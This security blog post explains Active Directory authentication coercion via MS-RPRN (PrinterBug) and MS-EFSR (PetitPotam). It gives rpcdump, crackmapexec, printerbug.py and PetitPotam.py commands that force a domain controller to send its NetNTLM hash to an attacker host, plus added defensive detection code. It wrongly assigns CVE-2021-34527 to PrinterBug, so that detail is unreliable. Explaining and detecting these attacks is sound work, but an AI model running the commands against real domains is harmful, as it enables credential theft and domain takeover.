Coerce | Part 1

Celia Catalán


Within Active Directory environments, attackers use forced authentication and man-in-the-middle (MitM) techniques to carry out a range of actions. In this post we introduce Coerce Authentication. Over several posts we will explain the different ways to perform this technique and how to chain it with other attacks to escalate privileges in a domain.

“Coerce authentication” is a technique that, through calls to Windows Remote Procedure Call (RPC) interfaces, forces a service to authenticate to a machine. With it, an attacker can force a vulnerable server to authenticate to a machine under the attacker's control and thus obtain the machine account's password hash in NetNTLM format.

A machine account in Windows networks is a unique identity associated with a device on the network. Machine accounts are essential for establishing communication and collaboration between devices within a Windows network environment.

Once a machine account hash has been obtained, a range of techniques open up to take advantage of that authentication and impersonate the victim. Part of the criticality of this technique lies in the fact that the victim is a machine: if it is used against a domain controller, for example, the entire domain can be compromised, which raises the severity considerably.

What is RPC?

RPC stands for Remote Procedure Call, which is a form of inter-process communication (IPC). This technology allows applications to send signals to each other to perform an operation.

In Windows environments, RPC is heavily used for many different services, such as scheduling tasks, creating services, configuring printers, configuring shared resources, managing encrypted data stored remotely, among others. …

Due to the nature of RPC as a remote vector, it attracts a lot of attention from a computer security point of view.

Main Vulnerable RPCs

Below we list the main RPC interfaces known to be abusable with the “Coerce Authentication” technique.

Note that exploiting these RPC interfaces requires a valid domain user account, except for the interface known as MS-EFSR, which could be triggered without any user.

For that second, anonymous case, Microsoft considered the behavior a vulnerability and released security patches to correct it.

MS-RPRN

MS-RPRN is the Remote Procedure Call related to the remote printing system protocol.

Microsoft's Print Spooler is a service that manages print jobs and other printing-related tasks. An attacker controlling a domain user or computer can, with a specific RPC call, trigger the spooler service on a target that runs it and make it authenticate to a host chosen by the attacker. Microsoft has marked this behavior as “Won't Fix”, and the service is enabled by default in all Windows environments.

Verification

To check whether the RPC interface is enabled on the victim's computer, you can use impacket's rpcdump tool:

Command: python3 rpcdump.py @dc.corp.lab | grep 'MS-RPRN'

Illustration 1 – MS-RPRN enabled.

It should be noted that there are more methods to check if said RPC is enabled using other tools and techniques.
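As an added check (example code written for this post's topic, not part of the original post or of impacket), the following Python parses rpcdump-style output and reports which coercion-prone interfaces a host exposes, keyed by interface UUID rather than by impacket's protocol label, so it also covers MS-EFSR. The sample output is constructed.

```python
import re
# Interface UUIDs taken from the protocol specifications. The UUID is the
# stable key: impacket's "Protocol:" annotation is "N/A" for interfaces it
# cannot name, so a grep on the protocol name alone can miss them.
COERCION_INTERFACES = {
    "12345678-1234-abcd-ef00-0123456789ab": "MS-RPRN",
    "c681d488-d850-11d0-8c52-00c04fd90f7e": "MS-EFSR",
    "df1941c5-fe89-4e79-bf10-463657acf44d": "MS-EFSR",
}
# Constructed sample in rpcdump.py's layout; not captured from a real host.
SAMPLE_RPCDUMP = """\
Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:10.0.0.5[49669]
          ncacn_np:\\\\DC[\\pipe\\spoolss]

Protocol: N/A
Provider: N/A
UUID    : C681D488-D850-11D0-8C52-00C04FD90F7E v1.0
Bindings:
          ncacn_np:\\\\DC[\\pipe\\efsrpc]

Protocol: [MS-SCMR]: Service Control Manager Remote Protocol
Provider: services.exe
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0
Bindings:
          ncacn_ip_tcp:10.0.0.5[49670]
"""

def parse_rpcdump(text):
    """Split rpcdump output into one record per interface (uuid + bindings)."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        match = re.search(r"UUID\s*:\s*([0-9a-fA-F-]{36})", block)
        if not match:
            continue
        bindings = re.findall(r"^\s+(ncacn_\S+)\s*$", block, re.M)
        records.append({"uuid": match.group(1).lower(), "bindings": bindings})
    return records

def exposed_coercion_interfaces(text):
    """Map each coercion-prone interface the host exposes to its bindings."""
    findings = {}
    for rec in parse_rpcdump(text):
        name = COERCION_INTERFACES.get(rec["uuid"])
        if name:
            findings.setdefault(name, []).extend(rec["bindings"])
    return findings
```

Run it over the real output of `python3 rpcdump.py @host` to inventory which hosts expose these interfaces and over which transports.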

Exploitation

After verifying that the RPC interface called “MS-RPRN” is enabled on the victim, and having compromised a domain user by other means, it will be exploited through a PoC called Printer Bug or SpoolSample, to which the identifier CVE-2021-34527 is assigned.

Likewise, to verify that authentication is forced correctly, we will use the user “bob” with limited privileges in the domain “dc.corp.lab”.

Command: python3 printerbug.py "CORP/bob:@dc.corp.lab" attack_machine

Illustration 2 – Successful exploitation of printerbug.

After the vulnerability was exploited, the NetNTLMv2 hash of the domain controller's machine account was obtained.

Illustration 3 – NetNTLM hash obtained.


MS-EFSR


MS-EFSR is the Remote Procedure Call interface for the Encrypting File System Remote protocol. It performs maintenance and management operations on encrypted data that is stored remotely and accessed over a network, and it is exposed as an RPC interface.
Note that this RPC interface was originally exploitable anonymously, without first having compromised a domain user account. For that reason Microsoft released two security patches, on August 10, 2021 and on May 10, 2022, which remove the possibility of performing this technique without a domain user.

Verification


In this case we will use the crackmapexec tool, now known as netexec, running its “petitpotam” module to check anonymously whether the server is vulnerable:

Command: crackmapexec smb dc.corp.lab -M petitpotam

Illustration 4 – Domain Controller vulnerable.

It should be noted that there are more methods to check if said RPC is enabled using other tools and techniques.

Exploitation


After verifying that the domain controller is vulnerable to anonymous access, it will be exploited through a PoC called PetitPotam, to which two identifiers are assigned: CVE-2021-36942 and CVE-2022-26925.

To verify that authentication is forced anonymously, we will run the PoC leaving the user (-u), password (-p) and domain (-d) parameters empty.

Command: python3 PetitPotam.py -u "" -p "" -d "" attack_machine dc.corp.lab

Illustration 5 – Successful exploitation of PetitPotam.

The capture of the NetNTLM hash can be seen in the Responder tool.

Illustration 7 – NetNTLM hash obtained.
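Both walkthroughs above (MS-RPRN with a low-privileged user, MS-EFSR anonymously) begin with the caller opening a named pipe on the target. As an added example that is not part of the original post, the following Python shows a detection pass a defender could run on the target over Windows Security events 5145 and 4624; it assumes Detailed File Share auditing is enabled, and the events are constructed.

```python
# Named pipes through which the interfaces discussed in this post are reached.
COERCION_PIPES = {
    "spoolss": "MS-RPRN",
    "efsrpc": "MS-EFSR",
    "lsarpc": "MS-EFSR",  # EFSRPC is also exposed over the lsarpc pipe
}
# lsarpc sees heavy legitimate use, so it is only reported when the
# calling session is anonymous (the unpatched MS-EFSR case).
ANON_ONLY_PIPES = {"lsarpc"}
# Constructed sample events (field names as in the Security event XML);
# not captured from a real host.
EVENTS = [
    {"EventID": 4624, "LogonId": "0x3a1f2", "TargetUserName": "bob",
     "LogonType": 3, "IpAddress": "10.0.0.99"},
    {"EventID": 5145, "SubjectLogonId": "0x3a1f2", "SubjectUserName": "bob",
     "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "spoolss",
     "IpAddress": "10.0.0.99"},
    {"EventID": 4624, "LogonId": "0x3b004", "TargetUserName": "ANONYMOUS LOGON",
     "LogonType": 3, "IpAddress": "10.0.0.99"},
    {"EventID": 5145, "SubjectLogonId": "0x3b004",
     "SubjectUserName": "ANONYMOUS LOGON", "ShareName": "\\\\*\\IPC$",
     "RelativeTargetName": "lsarpc", "IpAddress": "10.0.0.99"},
    {"EventID": 5145, "SubjectLogonId": "0x3c120", "SubjectUserName": "alice",
     "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "lsarpc",
     "IpAddress": "10.0.0.20"},
    {"EventID": 5145, "SubjectLogonId": "0x3c120", "SubjectUserName": "alice",
     "ShareName": "\\\\*\\Finance", "RelativeTargetName": "report.xlsx",
     "IpAddress": "10.0.0.20"},
]

def find_coercion_attempts(events):
    """Flag IPC$ pipe opens that match a coercion interface, joined to the
    4624 logon of the same session so the analyst sees who and from where."""
    logons = {e["LogonId"]: e for e in events if e["EventID"] == 4624}
    findings = []
    for e in events:
        if e["EventID"] != 5145 or not e["ShareName"].endswith("IPC$"):
            continue
        pipe = e["RelativeTargetName"].lower()
        iface = COERCION_PIPES.get(pipe)
        anonymous = e["SubjectUserName"].upper() == "ANONYMOUS LOGON"
        if iface is None or (pipe in ANON_ONLY_PIPES and not anonymous):
            continue
        logon = logons.get(e["SubjectLogonId"], {})
        findings.append({"interface": iface, "pipe": pipe,
                         "user": e["SubjectUserName"], "anonymous": anonymous,
                         "source_ip": e["IpAddress"],
                         "logon_type": logon.get("LogonType")})
    return findings
```

An anonymous hit on lsarpc or efsrpc is a strong signal that the May 2022 MS-EFSR patch is missing on that host.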


In future installments we will continue with other vulnerable RPC interfaces. Until next time!

Dimas Pastor, Senior Analyst at Zerolynx Group.